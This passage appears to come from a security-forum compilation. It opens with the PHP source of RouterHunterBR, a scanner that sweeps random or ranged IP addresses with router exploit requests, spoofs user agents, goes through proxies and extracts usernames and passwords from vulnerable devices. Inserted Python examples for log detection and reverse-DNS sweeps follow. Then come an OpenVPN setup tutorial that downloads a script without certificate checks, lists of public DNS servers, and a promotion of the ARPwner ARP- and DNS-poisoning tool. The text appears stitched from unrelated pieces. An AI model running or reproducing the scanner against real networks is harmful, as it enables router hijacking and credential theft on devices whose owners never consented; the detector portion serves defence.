{$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 
'http://admin:12334@172.16.0.90:8080' \n{$_SESSION["c01"]}{$msg}{$_SESSION["c00"]}\n"); (is_null($op)) ? exit() : NULL; } //CREATING FORMATTING IPS FOR BAND function __getRange($range) { $ip = explode('.', $range); if (is_array($ip) && count($ip) == 4) { $ip[0] = (strstr($ip[0], '-')) ? explode('-', $ip[0]) : explode('-', "{$ip[0]}-{$ip[0]}"); $ip[1] = (strstr($ip[1], '-')) ? explode('-', $ip[1]) : explode('-', "{$ip[1]}-{$ip[1]}"); $ip[2] = (strstr($ip[2], '-')) ? explode('-', $ip[2]) : explode('-', "{$ip[2]}-{$ip[2]}"); $ip[3] = (strstr($ip[3], '-')) ? explode('-', $ip[3]) : explode('-', "{$ip[3]}-{$ip[3]}"); return $ip; } else { return FALSE; } } //GENERATING IPS RANDOM function __getIPRandom() { $bloc1 = rand(0, 255); $bloc2 = rand(0, 255); $bloc3 = rand(0, 255); $bloc4 = rand(0, 255); $ip = "{$bloc1}.{$bloc2}.{$bloc3}.{$bloc4}"; return $ip; } //OPENING FILE FILE IPS function __getIPFile($file) { if (isset($file) && !empty($file)) { $resultIP = array_unique(array_filter(explode("\n", file_get_contents($file)))); __plus(); if (is_array($resultIP)) { return ($resultIP); } } return FALSE; } //AGENT REQUEST RANDOM function __getUserAgentRandom() { //AGENT BROSER $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox', 'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror' ); //AGENT OPERATING SYSTEM $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD', 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix', 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android' ); //AGENT LOCAL FAKE $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO', 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar', 'be_BY', 'be', 
'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK' ); return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ''; } //SEND REQUEST SERVER function __request($params) { $objcurl = curl_init(); $status = array(); curl_setopt($objcurl, CURLOPT_URL, "http://{$params['host']}{$params['exploit']}"); (!is_null($params['proxy']) ? curl_setopt($objcurl, CURLOPT_PROXY, $params['proxy']) : NULL); curl_setopt($objcurl, CURLOPT_USERAGENT, __getUserAgentRandom()); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl); __plus(); $server = curl_getinfo($objcurl); __plus(); //FILTERING SERVER INFORMATION preg_match_all('(HTTP.*)', $info['corpo'], $status['http']); preg_match_all('(Server:.*)', $info['corpo'], $status['server']); preg_match_all('(X-Powered-By:.*)', $info['corpo'], $status['X-Powered-By']); $info['dados_01'] = $server; $info['dados_02'] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}")); curl_close($objcurl); __plus(); return $info; } //SUB PROCESS function __subProcess($params, $target) { foreach ($params['exploit_model'] as $camp => $value) { $params['exploit'] = $value; $params['exploit_model'] = $camp; $params['host'] = $target; $rest = __request($params); __plus(); if ($rest['dados_01']['http_code'] != 0) { break; } } __plus(); $_SESSION["cont_ip"] ++; if ($rest['dados_01']['http_code'] == 200) { //FOUND FILE $style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . 
"{$_SESSION["c05"]}"; echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; $output_view = "{$style_var} [ ! ]__[iNFO][COD]: {$rest['dados_01']['http_code']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][iP/FILE]: {$params['host']}{$params['exploit']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][MODEL]: {$params['exploit_model']}\n"; $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_1]: {$rest['dados_02']}\n{$_SESSION["c00"]}"; $info_ip = __infoIP($rest['dados_01']['primary_ip']); $output_view .= "{$style_var} [ ! ]__[iNFO][DETAILS_2]: {$info_ip}\n{$_SESSION["c00"]}"; echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"]; $output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}"; file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND); __plus(); } else { //FILE NOT FOUND echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}"; } echo $_SESSION["c07"] . $params['line'] . 
$_SESSION["c00"]; } function main($params) { //IMPLEMENTATION HOME echo __banner("{$_SESSION["c13"]}{$params['line']}\n{$_SESSION["c00"]}", 1); if ($params['op'] == 0) { //WORKING WITH IPS ON TRACK for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) { __plus(); __subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}"); __plus(); } for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) { __plus(); __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}"); __plus(); } } elseif ($params['op'] == 1) { //WORKING WITH IP RANDOM !not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL; for ($i = 0; $i <= $params['limit-ip']; $i++) { __subProcess($params, __getIPRandom()); __plus(); } } elseif ($params['op'] == 2) { //IP WORK SOURCE FILE !is_array($params['file']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL; __plus(); foreach ($params['file'] as $value) { __subProcess($params, $value); __plus(); } } } //RUNNING ALL PROCESS main($params); Mirror Source
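As an added defender-side example (not part of RouterHunterBR or this post), the following Python flags requests to the three endpoints defined in the exploit table above when they show up in a web-server access log, and marks any dnsPrimary/dnsSecondary value that is outside an operator allowlist; the log lines, the allowlist and every address in them are constructed.

```python
"""Spot probes of the unauthenticated DNS-change / credential-disclosure
endpoints from web-server access logs (Apache/nginx "combined" format).

Added example, not RouterHunterBR code. The sample log, the allowlist and all
addresses below are constructed (RFC 5737 documentation ranges).
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set
from urllib.parse import parse_qs, urlsplit

# Request paths taken from the exploit definitions on the page, keyed to the
# model names RouterHunterBR uses for them.
PROBED_PATHS = {
    "/dnscfg.cgi": "Shuttle_Tech_ADSL_Modem_Router_915_WM",
    "/dns_1": "D_Link_DSL_2740R",
    "/dvr/wwwroot/user.cgi": "LG_DVR_LE6016D",
}

# Resolvers the operator really configures (constructed). Any other value
# pushed into dnsPrimary/dnsSecondary is treated as a hijack attempt.
EXPECTED_RESOLVERS: Set[str] = {"192.0.2.53", "192.0.2.54"}

# Only the prefix of a combined-format line is needed: source, timestamp,
# request line and status code.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


@dataclass
class Finding:
    src: str
    ts: str
    model: str
    path: str
    status: int
    primary: Optional[str]
    secondary: Optional[str]
    rogue_dns: bool  # True when a submitted DNS value is outside the allowlist


def _first(qs: dict, key: str) -> Optional[str]:
    vals = qs.get(key)
    return vals[0] if vals else None


def analyse_line(line: str) -> Optional[Finding]:
    """Return a Finding if the request targets one of the probed endpoints."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    model = PROBED_PATHS.get(parts.path)
    if model is None:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    primary = _first(qs, "dnsPrimary")
    secondary = _first(qs, "dnsSecondary")
    rogue = any(v is not None and v not in EXPECTED_RESOLVERS
                for v in (primary, secondary))
    return Finding(src=m.group("src"), ts=m.group("ts"), model=model,
                   path=parts.path, status=int(m.group("status")),
                   primary=primary, secondary=secondary, rogue_dns=rogue)


def scan_log(lines: List[str]) -> List[Finding]:
    """Run analyse_line over a log and keep only the hits."""
    return [f for f in (analyse_line(l) for l in lines) if f is not None]


# Constructed sample log: one benign request, one DNS-change attempt with
# rogue resolvers, one with the expected resolvers that 404s, one DVR probe.
SAMPLE_LOG = [
    '198.51.100.7 - - [17/Nov/2016:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Nov/2016:10:00:02 +0000] "GET /dnscfg.cgi?dnsPrimary=203.0.113.9&dnsSecondary=203.0.113.10&dnsDynamic=0&dnsRefresh=1 HTTP/1.1" 200 231 "-" "Opera/12.3 (Windows 95 5.2; ar_EG"',
    '198.51.100.7 - - [17/Nov/2016:10:00:03 +0000] "GET /dns_1?Enable_DNSFollowing=1&dnsPrimary=192.0.2.53&dnsSecondary=192.0.2.54 HTTP/1.1" 404 0 "-" "curl/7.47"',
    '203.0.113.77 - - [17/Nov/2016:10:00:04 +0000] "GET /dvr/wwwroot/user.cgi HTTP/1.1" 200 1890 "-" "Firefox/3.1 (Unix 2.4; en-US"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "ROGUE DNS" if f.rogue_dns else "probe"
        print(f"{f.ts} {f.src} -> {f.model} {f.path} status={f.status} "
              f"[{flag}] primary={f.primary} secondary={f.secondary}")
```

A 200 on the DNS-change path from a non-allowlisted address is the signal to check the device's configured resolvers and close the remote-administration interface.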
11. Description: Resolver is a Windows-based tool designed to perform a reverse DNS lookup for a given IP address, or for a range of IPs, in order to find its PTR record. Updated to version 1.0.3: added DNS records brute force. Download: Resolver | SourceForge.net
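As an added example (not the Resolver tool's code), this Python builds the PTR query name for IPv4 and IPv6 addresses and sweeps a range through a pluggable resolver; the PTR table is constructed so the sweep runs offline, and system_resolver is the optional real lookup through the OS.

```python
"""Reverse-DNS sweep of an address range: build the PTR query name for each
address and look it up through a pluggable resolver.

Added example, not the Resolver tool's code. FAKE_ZONE is a constructed PTR
table; pass system_resolver instead to query real DNS.
"""
import ipaddress
import socket
from typing import Callable, Dict, Iterator, Optional, Union

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
Resolver = Callable[[str], Optional[str]]


def ptr_name(ip: str) -> str:
    """Name queried for a PTR record: reversed octets under in-addr.arpa for
    IPv4, reversed hex nibbles (all 32, leading zeros kept) under ip6.arpa."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 4:
        return ".".join(reversed(str(addr).split("."))) + ".in-addr.arpa"
    nibbles = addr.exploded.replace(":", "")
    return ".".join(reversed(nibbles)) + ".ip6.arpa"


def iter_range(spec: str) -> Iterator[IPAddress]:
    """Accept a single address, a CIDR block, or 'first-last'."""
    if "-" in spec:
        first, last = (ipaddress.ip_address(p.strip()) for p in spec.split("-", 1))
        cur = first
        while cur <= last:
            yield cur
            cur += 1
    else:
        # strict=False lets a host address stand for its own /32 or /128
        yield from ipaddress.ip_network(spec, strict=False)


def system_resolver(ip: str) -> Optional[str]:
    """Real lookup via the OS resolver (network required)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def reverse_sweep(spec: str, resolve: Resolver) -> Dict[str, Optional[str]]:
    """Map every address in the range to its PTR target (None if no record)."""
    return {str(a): resolve(str(a)) for a in iter_range(spec)}


# Constructed PTR table standing in for a reverse zone, keyed by query name.
FAKE_ZONE = {
    "1.2.0.192.in-addr.arpa": "ns1.example.net.",
    "3.2.0.192.in-addr.arpa": "mail.example.net.",
    # PTR name for 2001:db8::1: "1", twenty-three "0" nibbles, then 8.b.d.0.1.0.0.2
    "1" + ".0" * 23 + ".8.b.d.0.1.0.0.2.ip6.arpa": "v6host.example.net.",
}


def table_resolver(ip: str) -> Optional[str]:
    """Offline resolver: answers only from FAKE_ZONE."""
    return FAKE_ZONE.get(ptr_name(ip))


if __name__ == "__main__":
    for ip, host in reverse_sweep("192.0.2.0/30", table_resolver).items():
        print(f"{ip:<16} {ptr_name(ip):<28} -> {host or '(no PTR)'}")
```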
12. There are many ways you can go about creating your own Virtual Private Network. Let’s do the easiest one in this tutorial, which will be how to use your VPS as your own VPN for your main machine's connection. – ro0ted

What’s used in this tutorial?
- Digital Ocean's Cloud Debian Server VPS
- Putty AIO

Open Puttygen > click Generate > move your mouse around the blank space. Then copy the public key to the clipboard and save the public/private key. Go to the Digital Ocean control panel and click SSH Keys. Copy and paste the public key from Puttygen to the Control Panel. Now open Putty. Once you are in Auth, in RLogin enter root. Now you can connect to your server without ever entering a key. Minimize this window and go to Create Droplet to make your server. Edit yours how you want, just make sure you don’t enable IPv6. Debian is more stable than all of them. Click SSH Key before clicking Create Droplet. Then go to Droplets in the left side menu. Copy and paste the IP from Droplets into your Putty. Click Open. It should work flawlessly. If it does ask for a passphrase, e.g. "Passphrase for RSA-Key", that means you put a passphrase in Puttygen. If it says password for root, you did something wrong.

If you can set this VPN server up through this tutorial then just throw your computer away, because this is an automatic installation for you. There’s really nothing to explain. This script does everything for you. Is it the safest way? Probably not, but the more IMPORTANT question should be: who do you trust more with your logs?

Once signed in, type:
```
sudo apt-get dist-upgrade
sudo apt-get upgrade
sudo apt-get update
wget http://git.io/vpn --no-check-certificate -O openvpn-install.sh; chmod +x openvpn-install.sh;
```

mirror:
```bash
#!/bin/bash
# OpenVPN road warrior installer for Debian-based distros

# This script will only work on Debian-based systems. It isn't bulletproof but
# it will probably work if you simply want to setup a VPN on your Debian/Ubuntu
# VPS. It has been designed to be as unobtrusive and universal as possible.

if [[ "$USER" != 'root' ]]; then
    echo "Sorry, you need to run this as root"
    exit
fi

if [[ ! -e /dev/net/tun ]]; then
    echo "TUN/TAP is not available"
    exit
fi

if [[ ! -e /etc/debian_version ]]; then
    echo "Looks like you aren't running this installer on a Debian-based system"
    exit
fi

newclient () {
    # Generates the client.ovpn
    cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf ~/$1.ovpn
    sed -i "/ca ca.crt/d" ~/$1.ovpn
    sed -i "/cert client.crt/d" ~/$1.ovpn
    sed -i "/key client.key/d" ~/$1.ovpn
    echo "<ca>" >> ~/$1.ovpn
    cat /etc/openvpn/easy-rsa/2.0/keys/ca.crt >> ~/$1.ovpn
    echo "</ca>" >> ~/$1.ovpn
    echo "<cert>" >> ~/$1.ovpn
    cat /etc/openvpn/easy-rsa/2.0/keys/$1.crt >> ~/$1.ovpn
    echo "</cert>" >> ~/$1.ovpn
    echo "<key>" >> ~/$1.ovpn
    cat /etc/openvpn/easy-rsa/2.0/keys/$1.key >> ~/$1.ovpn
    echo "</key>" >> ~/$1.ovpn
}

# Try to get our IP from the system and fallback to the Internet.
# I do this to make the script compatible with NATed servers (lowendspirit.com)
# and to avoid getting an IPv6.
IP=$(ifconfig | grep 'inet addr:' | grep -v inet6 | grep -vE '127\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | cut -d: -f2 | awk '{ print $1}' | head -1)
if [[ "$IP" = "" ]]; then
    IP=$(wget -qO- ipv4.icanhazip.com)
fi

if [[ -e /etc/openvpn/server.conf ]]; then
    while :
    do
        clear
        echo "Looks like OpenVPN is already installed"
        echo "What do you want to do?"
        echo ""
        echo "1) Add a cert for a new user"
        echo "2) Revoke existing user cert"
        echo "3) Remove OpenVPN"
        echo "4) Exit"
        echo ""
        read -p "Select an option [1-4]: " option
        case $option in
            1)
            echo ""
            echo "Tell me a name for the client cert"
            echo "Please, use one word only, no special characters"
            read -p "Client name: " -e -i client CLIENT
            cd /etc/openvpn/easy-rsa/2.0/
            source ./vars
            # build-key for the client
            export KEY_CN="$CLIENT"
            export EASY_RSA="${EASY_RSA:-.}"
            "$EASY_RSA/pkitool" $CLIENT
            # Generate the client.ovpn
            newclient "$CLIENT"
            echo ""
            echo "Client $CLIENT added, certs available at ~/$CLIENT.ovpn"
            exit
            ;;
            2)
            echo ""
            echo "Tell me the existing client name"
            read -p "Client name: " -e -i client CLIENT
            cd /etc/openvpn/easy-rsa/2.0/
            . /etc/openvpn/easy-rsa/2.0/vars
            . /etc/openvpn/easy-rsa/2.0/revoke-full $CLIENT
            # If it's the first time revoking a cert, we need to add the crl-verify line
            if grep -q "crl-verify" "/etc/openvpn/server.conf"; then
                echo ""
                echo "Certificate for client $CLIENT revoked"
            else
                echo "crl-verify /etc/openvpn/easy-rsa/2.0/keys/crl.pem" >> "/etc/openvpn/server.conf"
                /etc/init.d/openvpn restart
                echo ""
                echo "Certificate for client $CLIENT revoked"
            fi
            exit
            ;;
            3)
            apt-get remove --purge -y openvpn openvpn-blacklist
            rm -rf /etc/openvpn
            rm -rf /usr/share/doc/openvpn
            sed -i '/--dport 53 -j REDIRECT --to-port/d' /etc/rc.local
            sed -i '/iptables -t nat -A POSTROUTING -s 10.8.0.0/d' /etc/rc.local
            echo ""
            echo "OpenVPN removed!"
            exit
            ;;
            4) exit;;
        esac
    done
else
    clear
    echo 'Welcome to this quick OpenVPN "road warrior" installer'
    echo ""
    # OpenVPN setup and first user creation
    echo "I need to ask you a few questions before starting the setup"
    echo "You can leave the default options and just press enter if you are ok with them"
    echo ""
    echo "First I need to know the IPv4 address of the network interface you want OpenVPN"
    echo "listening to."
    read -p "IP address: " -e -i $IP IP
    echo ""
    echo "What port do you want for OpenVPN?"
    read -p "Port: " -e -i 1194 PORT
    echo ""
    echo "Do you want OpenVPN to be available at port 53 too?"
    echo "This can be useful to connect under restrictive networks"
    read -p "Listen at port 53 [y/n]: " -e -i n ALTPORT
    echo ""
    echo "Do you want to enable internal networking for the VPN?"
    echo "This can allow VPN clients to communicate between them"
    read -p "Allow internal networking [y/n]: " -e -i n INTERNALNETWORK
    echo ""
    echo "What DNS do you want to use with the VPN?"
    echo "   1) Current system resolvers"
    echo "   2) OpenDNS"
    echo "   3) Level 3"
    echo "   4) NTT"
    echo "   5) Hurricane Electric"
    echo "   6) Yandex"
    read -p "DNS [1-6]: " -e -i 1 DNS
    echo ""
    echo "Finally, tell me your name for the client cert"
    echo "Please, use one word only, no special characters"
    read -p "Client name: " -e -i client CLIENT
    echo ""
    echo "Okay, that was all I needed. We are ready to setup your OpenVPN server now"
    read -n1 -r -p "Press any key to continue..."
    apt-get update
    apt-get install openvpn iptables openssl -y
    cp -R /usr/share/doc/openvpn/examples/easy-rsa/ /etc/openvpn
    # easy-rsa isn't available by default for Debian Jessie and newer
    if [[ ! -d /etc/openvpn/easy-rsa/2.0/ ]]; then
        wget --no-check-certificate -O ~/easy-rsa.tar.gz https://github.com/OpenVPN/easy-rsa/archive/2.2.2.tar.gz
        tar xzf ~/easy-rsa.tar.gz -C ~/
        mkdir -p /etc/openvpn/easy-rsa/2.0/
        cp ~/easy-rsa-2.2.2/easy-rsa/2.0/* /etc/openvpn/easy-rsa/2.0/
        rm -rf ~/easy-rsa-2.2.2
        rm -rf ~/easy-rsa.tar.gz
    fi
    cd /etc/openvpn/easy-rsa/2.0/
    # Let's fix one thing first...
    cp -u -p openssl-1.0.0.cnf openssl.cnf
    # Fuck you NSA - 1024 bits was the default for Debian Wheezy and older
    sed -i 's|export KEY_SIZE=1024|export KEY_SIZE=2048|' /etc/openvpn/easy-rsa/2.0/vars
    # Create the PKI
    . /etc/openvpn/easy-rsa/2.0/vars
    . /etc/openvpn/easy-rsa/2.0/clean-all
    # The following lines are from build-ca. I don't use that script directly
    # because it's interactive and we don't want that. Yes, this could break
    # the installation script if build-ca changes in the future.
    export EASY_RSA="${EASY_RSA:-.}"
    "$EASY_RSA/pkitool" --initca $*
    # Same as the last time, we are going to run build-key-server
    export EASY_RSA="${EASY_RSA:-.}"
    "$EASY_RSA/pkitool" --server server
    # Now the client keys. We need to set KEY_CN or the stupid pkitool will cry
    export KEY_CN="$CLIENT"
    export EASY_RSA="${EASY_RSA:-.}"
    "$EASY_RSA/pkitool" $CLIENT
    # DH params
    . /etc/openvpn/easy-rsa/2.0/build-dh
    # Let's configure the server
    cd /usr/share/doc/openvpn/examples/sample-config-files
    gunzip -d server.conf.gz
    cp server.conf /etc/openvpn/
    cd /etc/openvpn/easy-rsa/2.0/keys
    cp ca.crt ca.key dh2048.pem server.crt server.key /etc/openvpn
    cd /etc/openvpn/
    # Set the server configuration
    sed -i 's|dh dh1024.pem|dh dh2048.pem|' server.conf
    sed -i 's|;push "redirect-gateway def1 bypass-dhcp"|push "redirect-gateway def1 bypass-dhcp"|' server.conf
    sed -i "s|port 1194|port $PORT|" server.conf
    # DNS
    case $DNS in
        1)
        # Obtain the resolvers from resolv.conf and use them for OpenVPN
        grep -v '#' /etc/resolv.conf | grep 'nameserver' | grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | while read line; do
            sed -i "/;push \"dhcp-option DNS 208.67.220.220\"/a\push \"dhcp-option DNS $line\"" server.conf
        done
        ;;
        2)
        sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 208.67.222.222"|' server.conf
        sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 208.67.220.220"|' server.conf
        ;;
        3)
        sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 4.2.2.2"|' server.conf
        sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 4.2.2.4"|' server.conf
        ;;
        4)
        sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 129.250.35.250"|' server.conf
        sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 129.250.35.251"|' server.conf
        ;;
        5)
        sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 74.82.42.42"|' server.conf
        ;;
        6)
        sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 77.88.8.8"|' server.conf
        sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 77.88.8.1"|' server.conf
        ;;
    esac
    # Listen at port 53 too if user wants that
    if [[ "$ALTPORT" = 'y' ]]; then
        iptables -t nat -A PREROUTING -p udp -d $IP --dport 53 -j REDIRECT --to-port $PORT
        sed -i "1 a\iptables -t nat -A PREROUTING -p udp -d $IP --dport 53 -j REDIRECT --to-port $PORT" /etc/rc.local
    fi
    # Enable net.ipv4.ip_forward for the system
    sed -i 's|#net.ipv4.ip_forward=1|net.ipv4.ip_forward=1|' /etc/sysctl.conf
    # Avoid an unneeded reboot
    echo 1 > /proc/sys/net/ipv4/ip_forward
    # Set iptables
    if [[ "$INTERNALNETWORK" = 'y' ]]; then
        iptables -t nat -A POSTROUTING -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to $IP
        sed -i "1 a\iptables -t nat -A POSTROUTING -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to $IP" /etc/rc.local
    else
        iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to $IP
        sed -i "1 a\iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to $IP" /etc/rc.local
    fi
    # And finally, restart OpenVPN
    /etc/init.d/openvpn restart
    # Try to detect a NATed connection and ask about it to potential LowEndSpirit
    # users
    EXTERNALIP=$(wget -qO- ipv4.icanhazip.com)
    if [[ "$IP" != "$EXTERNALIP" ]]; then
        echo ""
        echo "Looks like your server is behind a NAT!"
        echo ""
        echo "If your server is NATed (LowEndSpirit), I need to know the external IP"
        echo "If that's not the case, just ignore this and leave the next field blank"
        read -p "External IP: " -e USEREXTERNALIP
        if [[ "$USEREXTERNALIP" != "" ]]; then
            IP=$USEREXTERNALIP
        fi
    fi
    # IP/port set on the default client.conf so we can add further users
    # without asking for them
    sed -i "s|remote my-server-1 1194|remote $IP $PORT|" /usr/share/doc/openvpn/examples/sample-config-files/client.conf
    # Generate the client.ovpn
    newclient "$CLIENT"
    echo ""
    echo "Finished!"
    echo ""
    echo "Your client config is available at ~/$CLIENT.ovpn"
    echo "If you want to add more clients, you simply need to run this script another time!"
fi
```

To begin the auto installer, type:
```
./openvpn-install.sh
```

Now, if your main machine is Windows, open Notepad. Go back to Putty and type:
```
cat ro0ted.ovpn
```
Copy all of it to the clipboard and paste it in Notepad > File > Save as > WhateverYouNamedTheClient.ovpn.

Check if your OpenVPN server is running; type:
```
ps ax|grep openvpn
```
You should see something like this:

Traffic forwarding has to be enabled for the VPN connection to work. Type:
```
nano /etc/sysctl.conf
```
and enable IPv4 forwarding by un-commenting the line “net.ipv4.ip_forward=0”, removing the # sign and changing 0 to 1 so it looks like this:
```
net.ipv4.ip_forward=1
```
Ctrl + X, select Y.

Enable masquerading in the firewall; type:
```
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
```

Go to Windows and download OpenVPN: http://openvpn.net/index.php/open-source/downloads.html
After you install it, transfer the ovpn-client1.tar.gz archive to your PC and unpack it to your OpenVPN GUI’s config folder (usually in “C:\Program Files(x86)\OpenVPN\config\”). Start OpenVPN GUI with right click, Run as Administrator (it works only when you run it as administrator). Right click on its System Tray icon and click Connect.

Source
13. Optimized for maximum speed, you will not feel any delays when browsing the web; access to an uncensored resolver, free of charge.
ipv4-DNS (No Logging, DNSSEC enabled): 84.200.70.40, 84.200.69.80
ipv6-DNS (No Logging, DNSSEC enabled): 2001:1608:10:25::9249:d69b, 2001:1608:10:25::1c04:b12f
Source: https://dns.watch
14. Many times (more often lately) I have run into the "vital" problem of Linux: updates through the repos. I don't know what causes it (many say it's the switch to IPv6), but it became stressful when you couldn't update various programs and so on. That is why I am writing this small tutorial. The solution takes less than 1 minute: System > Preferences > Network Connections. Find the current connection (cable/wireless/etc.) and edit the following in the "IPv4 Settings" tab: Method: the default is Automatic (DHCP); replace it with Automatic (DHCP) addresses only. Then add under DNS Servers: Google - 8.8.8.8, 8.8.4.4 and OpenDNS (adding these solved my problem) - 208.67.222.222, 208.67.220.220. Add them all (separated by commas) and it should work. PS: It worked for me on RDS, I don't know whether it works on other networks (some ISPs in the States have restrictions on certain DNS servers, for example). **Fail title
15. Hello guys, I am looking for a list of public DNS servers, powerful ones, and I found a list like this (powerful means that I would like DNS servers which are fast, reliable, high speed and always available), but I want more. Does anybody have an idea how I can find more? 4.2.2.4 216.52.65.1 216.83.236.227 216.54.2.10 216.250.190.144 216.215.19.4 216.211.191.9 8.8.8.8 216.211.191.3 64.136.173.5 64.136.164.77 64.135.2.250 37.143.9.90 68.87.85.102 68.87.78.134 85.38.28.86 85.38.28.84 91.218.228.249 91.186.192.3 91.185.6.10 91.185.2.10 I am looking forward to hearing from you guys. Thank you so much, Yohann
16. ARPwner was released at BlackHat USA 2012 by Nicolas Trippar. It is a tool to do ARP poisoning and DNS poisoning attacks, with a simple GUI and a plugin system to do filtering of the information gathered; it also has an implementation of sslstrip and is coded 100% in Python, so you can modify it to your needs. DOWNLOAD: https://github.com/ntrippar/ARPwner
